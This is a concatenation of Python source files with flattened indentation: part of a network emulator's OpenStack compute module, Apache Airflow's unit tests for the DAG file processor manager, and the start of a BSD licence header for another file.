network_dict['id'] = port.intf_name
network_dict['ip'] = port.ip_address
network_dict[network_dict['id']] = self.find_network_by_name_or_id(port.net_name).name
network.append(network_dict)
self.compute_nets[server.name] = network
c = self.dc.startCompute(server.name, image=server.image, command=server.command,
network=network, flavor_name=server.flavor)
server.emulator_compute = c
for intf in c.intfs.values():
for port_name in server.port_names:
port = self.find_port_by_name_or_id(port_name)
if port is not None:
if intf.name == port.intf_name:
# wait up to one second for the intf to come up
self.timeout_sleep(intf.isUp, 1)
if port.mac_address is not None:
intf.setMAC(port.mac_address)
else:
port.mac_address = intf.MAC()
# Start the real emulator command now as specified in the dockerfile
# ENV SON_EMU_CMD
config = c.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
if "SON_EMU_CMD=" in env_var:
cmd = str(env_var.split("=")[1])
server.son_emu_command = cmd
# execute command in new thread to ensure that GK is not blocked by VNF
t = threading.Thread(target=c.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
def stop_compute(self, server):
"""
Determines which links should be removed before removing the server itself.
:param server: The server that should be removed
        :type server: :class:`heat.resources.server`
"""
logging.debug("Stopping container %s with full name %s" % (server.name, server.full_name))
link_names = list()
for port_name in server.port_names:
link_names.append(self.find_port_by_name_or_id(port_name).intf_name)
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) in link_names:
# Remove all self created links that connect the server to the main switch
self._remove_link(server.name, link)
# Stop the server and the remaining connection to the datacenter switch
self.dc.stopCompute(server.name)
# Only now delete all its ports and the server itself
for port_name in server.port_names:
self.delete_port(port_name)
self.delete_server(server)
def find_server_by_name_or_id(self, name_or_id):
"""
Tries to find the server by ID and if this does not succeed then tries to find it via name.
:param name_or_id: UUID or name of the server.
:type name_or_id: ``str``
:return: Returns the server reference if it was found or None
:rtype: :class:`heat.resources.server`
"""
if name_or_id in self.computeUnits:
return self.computeUnits[name_or_id]
for server in self.computeUnits.values():
if server.name == name_or_id or server.template_name == name_or_id or server.full_name == name_or_id:
return server
return None
def create_server(self, name, stack_operation=False):
"""
Creates a server with the specified name. Raises an exception when a server with the given name already
exists!
:param name: Name of the new server.
:type name: ``str``
:param stack_operation: Allows the heat parser to create modules without adapting the current emulation.
:type stack_operation: ``bool``
:return: Returns the created server.
:rtype: :class:`heat.resources.server`
"""
if self.find_server_by_name_or_id(name) is not None and not stack_operation:
raise Exception("Server with name %s already exists." % name)
server = Server(name)
server.id = str(uuid.uuid4())
if not stack_operation:
self.computeUnits[server.id] = server
return server
def delete_server(self, server):
"""
Deletes the given server from the stack dictionary and the computeUnits dictionary.
:param server: Reference of the server that should be deleted.
:type server: :class:`heat.resources.server`
:return: * *False*: If the server name is not in the correct format ('datacentername_stackname_servername') \
or when no stack with the correct stackname was found.
* *True*: Else
:rtype: ``bool``
"""
if server is None:
return False
name_parts = server.name.split('_')
if len(name_parts) < 3:
return False
for stack in self.stacks.values():
if stack.stack_name == name_parts[1]:
stack.servers.pop(server.id, None)
if self.computeUnits.pop(server.id, None) is None:
return False
return True
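    # Name format sketch (names hypothetical): a server named
    # 'dc1_mystack_web1' splits into ['dc1', 'mystack', 'web1'], so
    # name_parts[1] ('mystack') is what gets matched against
    # stack.stack_name above.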
def find_network_by_name_or_id(self, name_or_id):
"""
Tries to find the network by ID and if this does not succeed then tries to find it via name.
:param name_or_id: UUID or name of the network.
:type name_or_id: ``str``
:return: Returns the network reference if it was found or None
:rtype: :class:`heat.resources.net`
"""
if name_or_id in self.nets:
return self.nets[name_or_id]
for net in self.nets.values():
if net.name == name_or_id:
return net
return None
def create_network(self, name, stack_operation=False):
"""
Creates a new network with the given name. Raises an exception when a network with the given name already
exists!
:param name: Name of the new network.
:type name: ``str``
:param stack_operation: Allows the heat parser to create modules without adapting the current emulation.
:type stack_operation: ``bool``
:return: :class:`heat.resources.net`
"""
logging.debug("Creating network with name %s" % name)
if self.find_network_by_name_or_id(name) is not None and not stack_operation:
logging.warning("Creating network with name %s failed, as it already exists" % name)
raise Exception("Network with name %s already exists." % name)
network = Net(name)
network.id = str(uuid.uuid4())
if not stack_operation:
self.nets[network.id] = network
return network
def delete_network(self, name_or_id):
"""
Deletes the given network.
:param name_or_id: Name or UUID of the network.
:type name_or_id: ``str``
"""
net = self.find_network_by_name_or_id(name_or_id)
if net is None:
raise Exception("Network with name or id %s does not exists." % name_or_id)
for stack in self.stacks.values():
stack.nets.pop(net.name, None)
self.nets.pop(net.id, None)
def create_port(self, name, stack_operation=False):
"""
Creates a new port with the given name. Raises an exception when a port with the given name already
exists!
:param name: Name of the new port.
:type name: ``str``
:param stack_operation: Allows the heat parser to create modules without adapting the current emulation.
:type stack_operation: ``bool``
:return: Returns the created port.
:rtype: :class:`heat.resources.port`
"""
port = self.find_port_by_name_or_id(name)
if port is not None and not stack_operation:
logging.warning("Creating port with name %s failed, as it already exists" % name)
raise Exception("Port with name %s already exists." % name)
logging.debug("Creating port with name %s" % name)
port = Port(name)
if not stack_operation:
self.ports[port.id] = port
port.create_intf_name()
return port
def find_port_by_name_or_id(self, name_or_id):
"""
Tries to find the port by ID and if this does not succeed then tries to find it via name.
        :param name_or_id: UUID or name of the port.
:type name_or_id: ``str``
:return: Returns the port reference if it was found or None
:rtype: :class:`heat.resources.port`
"""
if name_or_id in self.ports:
return self.ports[name_or_id]
for port in self.ports.values():
if port.name == name_or_id or port.template_name == name_or_id:
return port
return None
def delete_port(self, name_or_id):
"""
Deletes the given port. Raises an exception when the port was not found!
:param name_or_id: UUID or name of the port.
:type name_or_id: ``str``
"""
port = self.find_port_by_name_or_id(name_or_id)
if port is None:
raise Exception("Port with name or id %s does not exists." % name_or_id)
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) == port.intf_name and \
str(link.intf1.ip) == port.ip_address.split('/')[0]:
self._remove_link(link.intf1.node.name, link)
break
self.ports.pop(port.id, None)
for stack in self.stacks.values():
stack.ports.pop(port.name, None)
def _add_link(self, node_name, ip_address, link_name, net_name):
"""
Adds a new link between datacenter switch and the node with the given name.
:param node_name: Name of the required node.
:type node_name: ``str``
:param ip_address: IP-Address of the node.
:type ip_address: ``str``
:param link_name: Link name.
:type link_name: ``str``
:param net_name: Network name.
:type net_name: ``str``
"""
node = self.dc.net.get(node_name)
params = {'params1': {'ip': ip_address,
'id': link_name,
link_name: net_name},
'intfName1': link_name,
'cls': Link}
link = self.dc.net.addLink(node, self.dc.switch, **params)
OpenstackCompute.timeout_sleep(link.intf1.isUp, 1)
def _remove_link(self, server_name, link):
"""
Removes a link between server and datacenter switch.
:param server_name: Specifies the server where the link starts.
:type server_name: ``str``
:param link: A reference of the link which should be removed.
:type link: :class:`mininet.link`
"""
self.dc.switch.detach(link.intf2)
del self.dc.switch.intfs[self.dc.switch.ports[link.intf2]]
del self.dc.switch.ports[link.intf2]
del self.dc.switch.nameToIntf[link.intf2.name]
self.dc.net.removeLink(link=link)
for intf_key in self.dc.net[server_name].intfs.keys():
if self.dc.net[server_name].intfs[intf_key].link == link:
self.dc.net[server_name].intfs[intf_key].delete()
del self.dc.net[server_name].intfs[intf_key]
@staticmethod
def timeout_sleep(function, max_sleep):
"""
        Executes `function` every 0.1 seconds until it returns a truthy value.
        Gives up and returns after `max_sleep` seconds if it never succeeds.
:param function: The function to execute. Should return true if done.
:type function: ``function``
:param max_sleep: Max seconds to sleep. 1 equals 1 second.
:type max_sleep: ``float``
"""
current_time = time.time()
stop_time = current_time + max_sleep
while not function() and current_time < stop_time:
current_time = time.time()
time.sleep(0.1)
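# Minimal usage sketch for OpenstackCompute.timeout_sleep, mirroring the call
# in _add_link above (the `link` object here is hypothetical): poll a
# readiness check every 0.1 seconds for at most one second.
#
#   OpenstackCompute.timeout_sleep(link.intf1.isUp, 1)
#
# The call returns as soon as isUp() reports True, or after ~1 second if the
# interface never comes up.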
|
test_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import pathlib
import random
import socket
import sys
import threading
import unittest
from datetime import datetime, timedelta
from tempfile import TemporaryDirectory
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
import pytest
from freezegun import freeze_time
from airflow.configuration import conf
from airflow.dag_processing.manager import (
DagFileProcessorAgent,
DagFileProcessorManager,
DagFileStat,
DagParsingSignal,
DagParsingStat,
)
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.models import DagBag, DagModel, TaskInstance as TI
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, TaskCallbackRequest
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.core.test_logging_config import SETTINGS_FILE_VALID, settings_context
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags
TEST_DAG_FOLDER = pathlib.Path(__file__).parent.parent / 'dags'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
# This fake processor will return the zombies it received in constructor
# as its processing result w/o actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_ids, callbacks):
super().__init__(file_path, pickle_dags, dag_ids, callbacks)
# We need a "real" selectable handle for waitable_handle to work
readable, writable = multiprocessing.Pipe(duplex=False)
writable.send('abc')
writable.close()
self._waitable_handle = readable
self._result = 0, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
@staticmethod
def _create_process(file_path, callback_requests, dag_ids, pickle_dags):
return FakeDagFileProcessorRunner(
file_path,
pickle_dags,
dag_ids,
callback_requests,
)
@property
def waitable_handle(self):
return self._waitable_handle
class TestDagFileProcessorManager(unittest.TestCase):
def setUp(self):
clear_db_runs()
def run_processor_manager_one_loop(self, manager, parent_pipe):
if not manager._async_mode:
parent_pipe.send(DagParsingSignal.AGENT_RUN_ONCE)
results = []
while True:
manager._run_parsing_loop()
while parent_pipe.poll(timeout=0.01):
obj = parent_pipe.recv()
if not isinstance(obj, DagParsingStat):
results.append(obj)
elif obj.done:
return results
raise RuntimeError("Shouldn't get here - nothing to read, but manager not finished!")
@conf_vars({('core', 'load_examples'): 'False'})
def test_max_runs_when_no_files(self):
child_pipe, parent_pipe = multiprocessing.Pipe()
with TemporaryDirectory(prefix="empty-airflow-dags-") as dags_folder:
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=dags_folder,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
child_pipe.close()
parent_pipe.close()
@pytest.mark.backend("mysql", "postgres")
def test_start_new_processes_with_same_filepath(self):
"""
        Test that when a processor already exists with a filepath, a new processor won't be created
with that filepath. The filepath will just be removed from the list.
"""
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
file_1 = 'file_1.py'
file_2 = 'file_2.py'
file_3 = 'file_3.py'
manager._file_path_queue = [file_1, file_2, file_3]
# Mock that only one processor exists. This processor runs with 'file_1'
manager._processors[file_1] = MagicMock()
# Start New Processes
manager.start_new_processes()
# Because of the config: '[scheduler] parsing_processes = 2'
# verify that only one extra process is created
# and since a processor with 'file_1' already exists,
# even though it is first in '_file_path_queue'
# a new processor is created with 'file_2' and not 'file_1'.
assert file_1 in manager._processors.keys()
assert file_2 in manager._processors.keys()
assert [file_3] == manager._file_path_queue
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
assert manager._processors == {}
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
assert manager._processors == {'abc.txt': mock_processor}
@conf_vars({("scheduler", "file_parsing_sort_mode"): "alphabetical"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_alphabetically(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test dag files are sorted alphabetically"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_1.py', 'file_2.py', 'file_3.py', 'file_4.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "random_seeded_by_host"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_random_seeded_by_host(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are randomly sorted and seeded by host name"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
        expected_order = list(dag_files)  # copy so the shuffle below does not mutate dag_files
random.Random(get_hostname()).shuffle(expected_order)
assert manager._file_path_queue == expected_order
# Verify running it again produces same order
manager._file_paths = []
manager.prepare_file_path_queue()
assert manager._file_path_queue == expected_order
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_file_paths_in_queue_sorted_by_modified_time(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are sorted by modified time"""
paths_with_mtime = {"file_3.py": 3.0, "file_2.py": 2.0, "file_4.py": 5.0, "file_1.py": 4.0}
dag_files = list(paths_with_mtime.keys())
mock_getmtime.side_effect = list(paths_with_mtime.values())
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_4.py', 'file_1.py', 'file_3.py', 'file_2.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_recently_modified_file_is_parsed_with_mtime_mode(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""
Test recently updated files are processed even if min_file_process_interval is not reached
"""
freezed_base_time = timezone.datetime(2020, 1, 5, 0, 0, 0)
initial_file_1_mtime = (freezed_base_time - timedelta(minutes=5)).timestamp()
dag_files = ["file_1.py"]
mock_getmtime.side_effect = [initial_file_1_mtime]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=3,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
        # let's say the DAG was last parsed 10 seconds before the frozen time
last_finish_time = freezed_base_time - timedelta(seconds=10)
manager._file_stats = {
"file_1.py": DagFileStat(1, 0, last_finish_time, 1.0, 1),
}
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
manager.prepare_file_path_queue()
assert manager._file_path_queue == []
# Simulate the DAG modification by using modified_time which is greater
# than the last_parse_time but still less than now - min_file_process_interval
file_1_new_mtime = freezed_base_time - timedelta(seconds=5)
file_1_new_mtime_ts = file_1_new_mtime.timestamp()
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
mock_getmtime.side_effect = [file_1_new_mtime_ts]
manager.prepare_file_path_queue()
            # Check that the file is added to the queue even though it was only recently parsed
assert manager._file_path_queue == ["file_1.py"]
assert last_finish_time < file_1_new_mtime
assert (
manager._file_process_interval
> (freezed_base_time - manager.get_last_finish_time("file_1.py")).total_seconds()
)
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(TEST_DAG_FOLDER, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_first')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
ti.job_id = local_job.id
session.add(ti)
session.commit()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1
)
manager._find_zombies()
requests = manager._callback_to_execute[dag.full_filepath]
assert 1 == len(requests)
assert requests[0].full_filepath == dag.full_filepath
assert requests[0].msg == "Detected as zombie"
assert requests[0].is_failure_callback is True
assert isinstance(requests[0].simple_task_instance, SimpleTaskInstance)
assert ti.dag_id == requests[0].simple_task_instance.dag_id
assert ti.task_id == requests[0].simple_task_instance.task_id
assert ti.execution_date == requests[0].simple_task_instance.execution_date
session.query(TI).delete()
session.query(LJ).delete()
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_handle_failure_callback_with_zombies_are_correctly_passed_to_dag_file_processor(
self, mock_processor
):
"""
Check that the same set of failure callback with zombies are passed to the dag
file processors until the next zombie detection logic is invoked.
"""
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
with conf_vars({('scheduler', 'parsing_processes'): '1', ('core', 'load_examples'): 'False'}):
dagbag = DagBag(test_dag_path, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_last')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
# TODO: If there was an actual Relationship between TI and Job
# we wouldn't need this extra commit
session.add(ti)
ti.job_id = local_job.id
session.commit()
expected_failure_callback_requests = [
TaskCallbackRequest(
full_filepath=dag.full_filepath,
simple_task_instance=SimpleTaskInstance(ti),
msg="Message",
)
]
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=test_dag_path,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
if async_mode:
# Once for initial parse, and then again for the add_callback_to_queue
assert len(fake_processors) == 2
assert fake_processors[0]._file_path == str(test_dag_path)
assert fake_processors[0]._callback_requests == []
else:
assert len(fake_processors) == 1
assert fake_processors[-1]._file_path == str(test_dag_path)
callback_requests = fake_processors[-1]._callback_requests
assert {zombie.simple_task_instance.key for zombie in expected_failure_callback_requests} == {
result.simple_task_instance.key for result in callback_requests
}
child_pipe.close()
parent_pipe.close()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.execution_timeout(10)
def test_dag_with_system_exit(self):
"""
        Test to check that a DAG that calls sys.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_directory = TEST_DAG_FOLDER.parent / 'dags_with_system_exit'
# Delete the one valid DAG/SerializedDAG, and check that it gets re-created
clear_db_dags()
clear_db_serialized_dags()
child_pipe, parent_pipe = multiprocessing.Pipe()
manager = DagFileProcessorManager(
dag_directory=dag_directory,
dag_ids=[],
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
manager._run_parsing_loop()
result = None
while parent_pipe.poll(timeout=None):
result = parent_pipe.recv()
if isinstance(result, DagParsingStat) and result.done:
break
# Three files in folder should be processed
assert sum(stat.run_count for stat in manager._file_stats.values()) == 3
with create_session() as session:
assert session.query(DagModel).get(dag_id) is not None
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.execution_timeout(30)
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_pipe_full_deadlock(self, mock_processor):
dag_filepath = TEST_DAG_FOLDER / "test_scheduler_dags.py"
child_pipe, parent_pipe = multiprocessing.Pipe()
# Shrink the buffers to exacerbate the problem!
for fd in (parent_pipe.fileno(),):
sock = socket.socket(fileno=fd)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
sock.detach()
exit_event = threading.Event()
# To test this behaviour we need something that continually fills the
# parent pipe's buffer (and keeps it full).
def keep_pipe_full(pipe, exit_event):
n = 0
while True:
if exit_event.is_set():
break
req = CallbackRequest(str(dag_filepath))
try:
logging.debug("Sending CallbackRequests %d", n + 1)
pipe.send(req)
except TypeError:
# This is actually the error you get when the parent pipe
# is closed! Nicely handled, eh?
break
except OSError:
break
n += 1
logging.debug(" Sent %d CallbackRequests", n)
thread = threading.Thread(target=keep_pipe_full, args=(parent_pipe, exit_event))
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=dag_filepath,
dag_ids=[],
            # A reasonably large number to ensure that we trigger the deadlock
max_runs=100,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
try:
thread.start()
# If this completes without hanging, then the test is good!
manager._run_parsing_loop()
exit_event.set()
finally:
logging.info("Closing pipes")
parent_pipe.close()
child_pipe.close()
thread.join(timeout=1.0)
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
        # Make sure that configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
remove_list = []
for mod in sys.modules:
if mod not in self.old_modules:
remove_list.append(mod)
for mod in remove_list:
del sys.modules[mod]
@staticmethod
def _processor_factory(file_path, zombies, dag_ids, pickle_dags):
return DagFileProcessorProcess(file_path, pickle_dags, dag_ids, zombies)
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
            # Since we are only reloading the logging config, not creating this file,
            # we expect it to be nonexistent.
assert not os.path.isfile(log_file_loc)
@conf_vars({('core', 'load_examples'): 'False'})
def test_parse_once(self):
clear_db_serialized_dags()
clear_db_dags()
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path, 1, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
processor_agent.heartbeat()
assert processor_agent.all_files_processed
assert processor_agent.done
with create_session() as session:
dag_ids = session.query(DagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
dag_ids = session.query(SerializedDagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
def test_launch_process(self):
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
assert os.path.isfile(log_file_loc)
|
commands.py
|
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2009-2010, James Vega
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
